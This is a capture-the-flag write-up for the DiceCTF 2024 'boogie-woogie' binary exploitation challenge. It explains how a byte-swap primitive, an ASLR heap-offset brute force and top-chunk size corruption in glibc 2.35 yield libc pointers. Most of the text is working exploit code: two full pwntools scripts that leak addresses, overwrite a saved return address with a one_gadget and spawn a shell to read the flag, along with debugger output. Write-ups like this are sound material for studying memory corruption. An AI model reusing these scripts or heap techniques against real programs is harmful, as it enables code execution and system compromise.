Boogie-woogie was a challenge in DiceCTF 2024 Quals. I played with idek and we placed 4th. I had loads of fun, see y’all in NYC :)
Before I start, a tl;dr
boogie-woogie is a fairly simple program
```
000011a9  void* clap(int64_t arg1, int64_t arg2)

000011eb      *(arg1 + &data) = *(arg1 + &data) ^ *(arg2 + &data)
0000121f      *(arg2 + &data) = *(arg2 + &data) ^ *(arg1 + &data)
00001253      *(arg1 + &data) = *(arg1 + &data) ^ *(arg2 + &data)
00001257      return arg1 + &data

00001258  int32_t main(int32_t argc, char** argv, char** envp)

00001264      void* fsbase
00001264      int64_t rax = *(fsbase + 0x28)
0000127d      puts(str: &__art)
0000128c      puts(str: "\x1b[0;33mEven this cursed spiri…")
00001303      while (data != 0)
00001293          int64_t var_18 = 0
000012b4          printf(format: "\n\x1b[31;49;1;4m%s\x1b[0m\n\n\n", &data)
000012c3          puts(str: "The sound of \x1b[0;33mgion shoj…")
000012e2          int64_t var_20
000012e2          __isoc99_scanf(format: "%zu %zu", &var_20, &var_18)
000012f5          clap(var_20, var_18)
0000130e      *(fsbase + 0x28)
00001317      if (rax == *(fsbase + 0x28))
0000131f          return 0
00001319      __stack_chk_fail()
00001319      noreturn
```
```
❯ checksec boogie-woogie
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
```
```
.data (PROGBITS) section started  {0xf000-0xf0b7}
0000f000  __data_start:
0000f000      00 00 00 00 00 00 00 00                          ........

0000f008  void* __dso_handle = __dso_handle

0000f010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

0000f020  char data[0x97] = "Listen closely, cursed spirit. There is no way you do not know this. An arm is\n"
0000f020                    "merely a decoration. The act of applause is an acclamation of the soul!", 0
.data (PROGBITS) section ended  {0xf000-0xf0b7}
.bss (NOBITS) section started  {0xf0b7-0xf0b8}
0000f0b7  char __bss_start = 0x0
.bss (NOBITS) section ended  {0xf0b7-0xf0b8}
```
Simple in this case means that it’s easy to understand and very difficult to solve. We have the ability to swap bytes relative to the program base but… there isn’t really much there.
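A quick aside on clap(): the triple XOR is the classic in-place swap, with one quirk that turns out to matter. If both indices are equal, the very first XOR zeroes the byte (x ^ x = 0), and sending `0 0` is exactly how the exploit later breaks out of the `while (data != 0)` loop. A minimal sanity check in Python:

```python
# Triple XOR swaps two distinct bytes in place...
buf = bytearray(b"AB")
buf[0] ^= buf[1]; buf[1] ^= buf[0]; buf[0] ^= buf[1]
assert buf == b"BA"

# ...but aliasing both operands to the same byte zeroes it instead:
buf[0] ^= buf[0]
assert buf[0] == 0
```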
__dso_handle? tl;dr: it's just a uuid lol
It is initialized at runtime to a recursive pointer (PIE base + 0xf008) and is used to filter which atexit functions run when an object is unloaded. It's a pointer only because that makes it implicitly unique; it is never dereferenced.
I was stuck at this point for a long time — we had an obvious and fairly strong primitive but nothing to do with it. This challenge runs under ASLR, so we don't know the location of any memory segment (besides the program itself, which can be leaked from __dso_handle).
```
gef> vmmap
[ Legend:  Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x000055f39d069000 0x000055f39d06a000 0x0000000000001000 0x0000000000000000 r-- /app/boogie-woogie
0x000055f39d06a000 0x000055f39d06b000 0x0000000000001000 0x0000000000001000 r-x /app/boogie-woogie
0x000055f39d06b000 0x000055f39d077000 0x000000000000c000 0x0000000000002000 r-- /app/boogie-woogie
0x000055f39d077000 0x000055f39d078000 0x0000000000001000 0x000000000000d000 r-- /app/boogie-woogie
0x000055f39d078000 0x000055f39d079000 0x0000000000001000 0x000000000000e000 rw- /app/boogie-woogie
0x000055f39de0e000 0x000055f39de2f000 0x0000000000021000 0x0000000000000000 rw- [heap]  <-  $rsi, $r9
```
Not all areas of memory are randomized the same way. The offset between .data and the heap is randomized by ASLR but it's not… that… random? I knew from staring at memory maps that it was always in the same general area, tested it experimentally with gdb, and then after the fact looked it up in the kernel source code. The heap on x86-64 Linux starts between 0 and 8192 pages after the end of the program (with ASLR off this is always 0: the heap starts directly after the program).
```c
// https://elixir.bootlin.com/linux/latest/source/fs/binfmt_elf.c#L1254
if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
	/*
	 * For architectures with ELF randomization, when executing
	 * a loader directly (i.e. no interpreter listed in ELF
	 * headers), move the brk area out of the mmap region
	 * (since it grows up, and may collide early with the stack
	 * growing down), and into the unused ELF_ET_DYN_BASE region.
	 */
	if (IS_ENABLED(CONFIG_ARCH_HAS_ELF_RANDOMIZE) &&
	    elf_ex->e_type == ET_DYN && !interpreter) {
		mm->brk = mm->start_brk = ELF_ET_DYN_BASE;
	}

	mm->brk = mm->start_brk = arch_randomize_brk(mm);
#ifdef compat_brk_randomized
	current->brk_randomized = 1;
#endif
}

// https://elixir.bootlin.com/linux/v6.7.4/source/arch/x86/kernel/process.c#L1031
unsigned long arch_randomize_brk(struct mm_struct *mm)
{
	return randomize_page(mm->brk, 0x02000000);
}

// https://elixir.bootlin.com/linux/v6.7.4/source/mm/util.c#L338
/**
 * randomize_page - Generate a random, page aligned address
 * @start:	The smallest acceptable address the caller will take.
 * @range:	The size of the area, starting at @start, within which the
 *		random address must fall.
 *
 * If @start + @range would overflow, @range is capped.
 *
 * NOTE: Historical use of randomize_range, which this replaces, presumed that
 * @start was already page aligned.  We now align it regardless.
 *
 * Return: A page aligned address within [start, start + range).  On error,
 * @start is returned.
 */
unsigned long randomize_page(unsigned long start, unsigned long range)
{
	if (!PAGE_ALIGNED(start)) {
		range -= PAGE_ALIGN(start) - start;
		start = PAGE_ALIGN(start);
	}

	if (start > ULONG_MAX - range)
		range = ULONG_MAX - start;

	range >>= PAGE_SHIFT;

	if (range == 0)
		return start;

	return start + (get_random_long() % range << PAGE_SHIFT);
}
```
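If you'd rather verify this empirically than trust my reading of the kernel, a quick and dirty way is to sample /proc/&lt;pid&gt;/maps across a few runs. This is a hypothetical sketch (assumes pwntools and a local copy of the binary), not part of the solve:

```python
# Sample the gap between the end of the program image and the start of [heap];
# with ASLR on it should fall in [0, 0x02000000) and always be page aligned.
from pwn import process

gaps = []
for _ in range(10):
    p = process("./boogie-woogie")
    p.recv(timeout=1)  # wait for the banner so glibc has set up the heap
    with open(f"/proc/{p.pid}/maps") as f:
        maps = f.read().splitlines()
    prog_end = max(int(l.split("-", 1)[1].split()[0], 16)
                   for l in maps if "boogie-woogie" in l)
    heap_start = next(int(l.split("-", 1)[0], 16)
                      for l in maps if "[heap]" in l)
    gaps.append(heap_start - prog_end)
    p.close()

print([hex(g) for g in gaps])
```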
To be quite honest, this is enough on its own. A 1-in-8192 brute isn't exactly fast, but frankly I've done stupider things for a flag than a three-hour brute (sry not sry infra; someone actually took it down doing this and got a PoW added).
In the end, though, there was a pretty easy optimization that cut that down to merely a couple hundred throws. The heap is (in this program, at the point we probe it) 33 pages long, and all we need to do is land somewhere inside it. Once we know one valid heap offset, we can walk backwards a page at a time until we find the tcache perthread header, bringing a 1/8192 chance down to 1/250-ish.
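A quick back-of-the-envelope for those numbers, using the 0x02000000 randomization range from the kernel snippet above:

```python
PAGE = 0x1000
slots = 0x02000000 // PAGE    # 8192 possible page-aligned heap start offsets
heap_pages = 33               # size of this program's heap when we probe it

print(slots)                  # 8192: odds of guessing the heap's exact page
print(slots / heap_pages)     # ~248: odds of a fixed guess landing inside it
```

The full brute force, plus the walk-back to the heap base: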
```python
#!/usr/bin/env python3

from pwn import *

e = ELF("boogie-woogie")

context.terminal = ["zellij", "action", "new-pane", "-d", "right", "-c", "--", "zsh", "-c"]
context.binary = e


@context.quietfunc
def conn():
    if args.LOCAL:
        r = process([e.path])
    elif args.GDB:
        r = gdb.debug([e.path])
    else:
        r = remote("localhost", 5000)

    return r


def main():
    def brute_heap_offset():
        idx = 0
        with log.progress('Bruting') as p:
            while True:
                try:
                    idx += 1
                    p.status("attempt %i", idx)
                    r = conn()
                    r.recvuntil(b"exception")
                    trial_heap_offset = 0x1995fe0
                    # trial_heap_offset = 0x1000 # lol testing without aslr

                    r.sendline(f"1 {trial_heap_offset}".encode())

                    r.recvuntil(b"exception")
                    r.sendline(f"1 {trial_heap_offset}".encode())
                    p.success()
                    return (r, trial_heap_offset >> 12 << 12)
                except EOFError:
                    with context.local(log_level='error'): r.close()

    r, heap_page = brute_heap_offset()

    def leak_relative_ptr(b):
        for x in range(8):
            r.sendline(f"{b+x} {1+x}".encode())

        for _ in range(8):
            r.readuntil(b"exception:")
        r.readuntil(b"4m")
        r.recvuntil(b"L")
        ptr = u64(r.read(6).ljust(8, b"\x00"))
        for x in range(8):
            r.sendline(f"{b+x} {1+x}".encode())

        for _ in range(8):
            r.readuntil(b"exception:")
        return ptr

    __dso_handle = leak_relative_ptr(-24)
    e.address = __dso_handle - e.symbols['__dso_handle']
    log.info(f'__dso_handle = {hex(__dso_handle)}')
    log.info(f"program base = {hex(e.address)}")
    log.info(f"offset to a heap page = {hex(heap_page)}")
    maybe_tcache_perthread = heap_page + 8 - 0x20
    r.readuntil(b"exception:")
    while True:
        r.sendline(f"1 {maybe_tcache_perthread}".encode())
        r.recvuntil(b"L")
        if r.recv(1) == b'\x91':
            r.readuntil(b"exception:")
            break
        r.readuntil(b"exception:")
        maybe_tcache_perthread -= 0x1000
    heap_base = maybe_tcache_perthread - 0x8
    log.info(f"offset to heap base = {hex(heap_base)}")
    # good luck pwning :)

    r.interactive()


if __name__ == "__main__":
    main()
```
So, what now?
```
gef> scan heap libc
[+] Searching for addresses in 'heap' that point to 'libc'
gef>
```
well that sucks lmao
Usually it's fairly straightforward to get pointers into libc onto the heap: free a chunk into the unsorted bin and both ends of its free list will point at main_arena, inside libc.
```c
// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L1926
static struct malloc_state main_arena =
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};

// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L1541
#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2])) \
             - offsetof (struct malloc_chunk, fd))

// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L1680
#define unsorted_chunks(M) (bin_at (M, 1))

// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4627
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
  malloc_printerr ("free(): corrupted unsorted chunks");
p->fd = fwd;
p->bk = bck;
```
Unfortunately, we don't have much ability to work with the heap in this binary. There is (as far as I'm aware) a single relevant primitive: scanf allocates a scratch buffer and then frees it at the end of the call. The lifetime of this chunk (allocated, used, freed, with nothing in between) usually just means it gets consolidated back into its neighbor (the top chunk, in this case).
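Concretely, triggering that allocate/free cycle from outside just means feeding scanf an over-long numeric token. This is the same payload the exploit uses later; my description of the buffering is a hedge on glibc's internals:

```python
# The second field is numeric garbage; what matters is that the token is too
# big for scanf's initial stack scratch buffer, so (as I understand the
# internals) it gets moved to a malloc()ed buffer of roughly the token's size,
# which is free()d when the call returns.
r.sendline(b"-1 -" + b"1" * 0x800)
```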
So, then, how can we prevent this consolidation? We don't have enough control over the ordering of heap chunks to stop it from happening naturally — but we do have a very strong write primitive. Can the heap be corrupted in such a way as to prevent consolidation, keeping in mind that we have no control between the allocation and its corresponding free?
There isn’t really much on the heap to work with but the first place to look is the top chunk — where our allocated chunk is split off from and then consolidated against.
```c
// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4353
use_top:
  /*
     If large enough, split off the chunk bordering the end of memory
     (held in av->top). Note that this is in accord with the best-fit
     search rule.  In effect, av->top is treated as larger (and thus
     less well fitting) than any other available chunk since it can
     be extended to be as large as necessary (up to system
     limitations).

     We require that av->top always exists (i.e., has size >=
     MINSIZE) after initialization, so if it would otherwise be
     exhausted by current request, it is replenished. (The main
     reason for ensuring it exists is that we may need MINSIZE space
     to put in fenceposts in sysmalloc.)
   */

  victim = av->top;
  size = chunksize (victim);

  if (__glibc_unlikely (size > av->system_mem))
    malloc_printerr ("malloc(): corrupted top size");

  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
      remainder_size = size - nb;
      remainder = chunk_at_offset (victim, nb);
      av->top = remainder;
      set_head (victim, nb | PREV_INUSE |
                (av != &main_arena ? NON_MAIN_ARENA : 0));
      set_head (remainder, remainder_size | PREV_INUSE);

      check_malloced_chunk (av, victim, nb);
      void *p = chunk2mem (victim);
      alloc_perturb (p, bytes);
      return p;
    }

  /* When we are using atomic ops to free fast chunks we can get
     here for all block sizes.  */
  else if (atomic_load_relaxed (&av->have_fastchunks))
    {
      malloc_consolidate (av);
      /* restore original bin index */
      if (in_smallbin_range (nb))
        idx = smallbin_index (nb);
      else
        idx = largebin_index (nb);
    }

  /*
     Otherwise, relay to handle system-dependent cases
   */
  else
    {
      void *p = sysmalloc (nb, av);
      if (p != NULL)
        alloc_perturb (p, bytes);
      return p;
    }
```
There are two cases when allocating a chunk without pulling from the bins: if the top chunk is large enough, the new chunk is split off from it; otherwise, malloc calls into sysmalloc to handle "system-dependent cases".
Sysmalloc has a lot of weird alternate cases! Allocations of sufficient size ("sufficient" being a sliding scale that starts at 128KB and caps at 4MB on amd64 libc 2.35) are fulfilled with mmap. Failing that, it will attempt to use sbrk to extend the heap. The key to our problem lies in how malloc handles one edge case of this heap extension: new heap pages that are not contiguous with the old heap (either because the address space is noncontiguous or because non-libc code called sbrk). In that case malloc skips over the gap, creates a new top chunk, inserts fenceposts to prevent consolidation, and frees the old top chunk.
```c
      /*
         If not the first time through, we either have a
         gap due to foreign sbrk or a non-contiguous region.  Insert a
         double fencepost at old_top to prevent consolidation with space
         we don't own. These fenceposts are artificial chunks that are
         marked as inuse and are in any case too small to use.  We need
         two to make sizes and alignments work out.
       */

      if (old_size != 0)
        {
          /*
             Shrink old_top to insert fenceposts, keeping size a
             multiple of MALLOC_ALIGNMENT. We know there is at least
             enough space in old_top to do this.
           */
          old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK;
          set_head (old_top, old_size | PREV_INUSE);

          /*
             Note that the following assignments completely overwrite
             old_top when old_size was previously MINSIZE.  This is
             intentional. We need the fencepost, even if old_top otherwise gets
             lost.
           */
          set_head (chunk_at_offset (old_top, old_size),
                    CHUNK_HDR_SZ | PREV_INUSE);
          set_head (chunk_at_offset (old_top, old_size + CHUNK_HDR_SZ),
                    CHUNK_HDR_SZ | PREV_INUSE);

          /* If possible, release the rest. */
          if (old_size >= MINSIZE)
            {
              _int_free (av, old_top, 1);
            }
        }
```
This is very promising, but we don't have the ability to actually force sbrk to return a noncontiguous page, right? The answer is no — but it turns out to be unnecessary! Contiguity is checked naively: the old heap end is computed from the top chunk's address plus the top chunk's size.
```c
// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L2606
old_top = av->top;
old_size = chunksize (old_top);
old_end = (char *) (chunk_at_offset (old_top, old_size));
// ...
// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L2547
if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE)) {
  // ...
} else {
  // handles noncontiguous sbrk
}
```
We don't need to force sbrk to return a noncontiguous page — just convince malloc that it did. By using our byte-swap primitive to shrink the top chunk's size field (from 0x20550 to 0x550) and then making an allocation larger than the new top chunk (which extends the heap), we end up with the old top chunk in the unsorted bin, with two pointers into libc sitting on the heap.
```python
top_chunk = heap_base + 0x0ab8
# swap the 0x02 byte of the top chunk's size field (0x20550) with a
# known-zero byte in .data's padding, shrinking the top chunk to 0x550
r.sendline(f"-3 {top_chunk+2}".encode())
# then request something larger than the shrunk top chunk: the over-long
# scanf token forces a heap extension, fenceposting, and a free of old top
r.sendline(b"-1 -" + b"1"*0x800)
```
```
gef> heap bins
Unsorted Bin for arena 'main_arena'
-----------------------------------------------------------
unsorted_bin[idx=0, size=any, @0x7ffff7faacf0]: fd=0x555555564ab0, bk=0x555555564ab0
 -> Chunk(addr=0x555555564ab0, size=0x530, flags=PREV_INUSE, fd=0x7ffff7faace0, bk=0x7ffff7faace0)
[+] Found 1 valid chunks in unsorted bin.
```
```
gef> scan heap libc
[+] Searching for addresses in 'heap' that point to 'libc'
[heap]: 0x0000555555564ac0 -> 0x00007ffff7faace0 -> 0x0000555555585000 -> 0x0000000000000000
[heap]: 0x0000555555564ac8 -> 0x00007ffff7faace0 -> 0x0000555555585000 -> 0x0000000000000000
gef>
```
With arbitrary write (ish — it's a swap, but we could stage arbitrary bytes in the stdin buffer if we needed them) it's basically over. I chose to replace a saved return address (and rbp, as rbp-0x78 needed to be writable) with a one gadget.
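Pulled out as a standalone helper, the write looks something like this (a sketch; the final script below just inlines it three times, and swap_absolute_str is defined there):

```python
def write_byte(addr, value):
    # A swap can only relocate existing bytes, so to "write" value at addr we
    # find a writable libc address that already holds that byte and swap the
    # two (the stack's old byte harmlessly lands in libc). pwntools'
    # writable=True filter alone returned read-only sections for me, hence
    # the extra bound check against libc's writable segment.
    src = next(x for x in libc.search(bytes([value]), writable=True)
               if x > libc.address + 0x21a000)
    r.sendline(swap_absolute_str(addr, src))
```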
gg fun challenge :)
```
❯ python3 solve.py
[+] Bruting: Done
[*] __dso_handle = 0x55d54865f008
[*] program base = 0x55d548650000
[*] offset to a heap page = 0x1995000
[*] offset to heap base = 0x1986fe0
[*] libc.address = 0x7f89e407e000
[*] stack address (main saved ret) = 0x7ffc792a8688
[*] one_gadget = 0x7f89e4169c88
[+] Receiving all data: Done (9B)
[*] Closed connection to localhost port 5000
b' dice{i7_S33MS_sOm3BODY_cOOK3D_h3r3_8ff4c343}\r\n'
```
```python
#!/usr/bin/env python3

from pwn import *

e = ELF("boogie-woogie")
libc = ELF("./libc.so.6")
context.terminal = ["zellij", "action", "new-pane", "-d", "right", "-c", "--", "zsh", "-c"]
context.binary = e


@context.quietfunc
def conn():
    if args.LOCAL:
        r = process([e.path])
    elif args.GDB:
        r = gdb.debug([e.path])
    else:
        r = remote("localhost", 5000)

    return r


def main():
    def brute_heap_offset():
        idx = 0
        with log.progress('Bruting') as p:
            while True:
                try:
                    idx += 1
                    p.status("attempt %i", idx)
                    r = conn()
                    r.recvuntil(b"exception")
                    trial_heap_offset = 0x1995fe0
                    # trial_heap_offset = 0x1000 # lol testing without aslr

                    r.sendline(f"1 {trial_heap_offset}".encode())

                    r.recvuntil(b"exception")
                    r.sendline(f"1 {trial_heap_offset}".encode())
                    p.success()
                    return (r, trial_heap_offset >> 12 << 12)
                except EOFError:
                    with context.local(log_level='error'): r.close()

    r, heap_page = brute_heap_offset()

    def leak_relative_ptr(b):
        for x in range(8):
            r.sendline(f"{b+x} {1+x}".encode())

        for _ in range(8):
            r.readuntil(b"exception:")
        r.readuntil(b"4m")
        r.recvuntil(b"L")
        ptr = u64(r.read(6).ljust(8, b"\x00"))
        for x in range(8):
            r.sendline(f"{b+x} {1+x}".encode())

        for _ in range(8):
            r.readuntil(b"exception:")
        return ptr

    __dso_handle = leak_relative_ptr(-24)
    e.address = __dso_handle - e.symbols['__dso_handle']
    log.info(f'__dso_handle = {hex(__dso_handle)}')
    log.info(f"program base = {hex(e.address)}")
    log.info(f"offset to a heap page = {hex(heap_page)}")
    maybe_tcache_perthread = heap_page + 8 - 0x20
    r.readuntil(b"exception:")
    while True:
        r.sendline(f"1 {maybe_tcache_perthread}".encode())
        r.recvuntil(b"L")
        if r.recv(1) == b'\x91':
            r.readuntil(b"exception:")
            break
        r.readuntil(b"exception:")
        maybe_tcache_perthread -= 0x1000
    heap_base = maybe_tcache_perthread - 0x8
    log.info(f"offset to heap base = {hex(heap_base)}")
    top_chunk = heap_base + 0x0ab8
    r.sendline(f"-3 {top_chunk+2}".encode())
    r.sendline(b"-1 -" + b"1"*0x800)

    libc.address = leak_relative_ptr(top_chunk + 8) - 0x21ace0

    def leak_absolute_ptr(ptr):
        return leak_relative_ptr(ptr - e.symbols['data'])

    def swap_absolute_str(addr_a, addr_b):
        return f"{addr_a - e.symbols['data']} {addr_b - e.symbols['data']}".encode()

    log.info(f"libc.address = {hex(libc.address)}")
    stack_ret_address = leak_absolute_ptr(libc.symbols['environ']) - 0x120
    log.info(f"stack address (main saved ret) = {hex(stack_ret_address)}")
    saved_rbp_address = stack_ret_address - 8
    one_gadget = libc.address + 0xebc88
    log.info(f"one_gadget = {hex(one_gadget)}")

    one_gadget_bytes = p64(one_gadget)[0:3]
    if len(one_gadget_bytes) != len(set(one_gadget_bytes)):
        log.error(f"lower 3 one gadget bytes must all be unique")

    for i in range(8):
        r.sendline(swap_absolute_str(e.symbols['data'] + heap_base + 0xac0 + i, saved_rbp_address + i))

    # writable=True was giving me r sections smh, manually check that
    r.sendline(swap_absolute_str(stack_ret_address, next(x for x in libc.search(one_gadget_bytes[0], writable=True) if x > libc.address + 0x21a000)))
    r.sendline(swap_absolute_str(stack_ret_address + 1, next(x for x in libc.search(one_gadget_bytes[1], writable=True) if x > libc.address + 0x21a000)))
    r.sendline(swap_absolute_str(stack_ret_address + 2, next(x for x in libc.search(one_gadget_bytes[2], writable=True) if x > libc.address + 0x21a000)))

    r.sendline(b"0 0")
    r.sendline(b"cat flag.txt;exit")
    r.recvuntil(b"$")
    print(r.recvall())
    # dice{i7_S33MS_sOm3BODY_cOOK3D_h3r3_8ff4c343}
    # good luck pwning :)

    # r.interactive()


if __name__ == "__main__":
    main()
```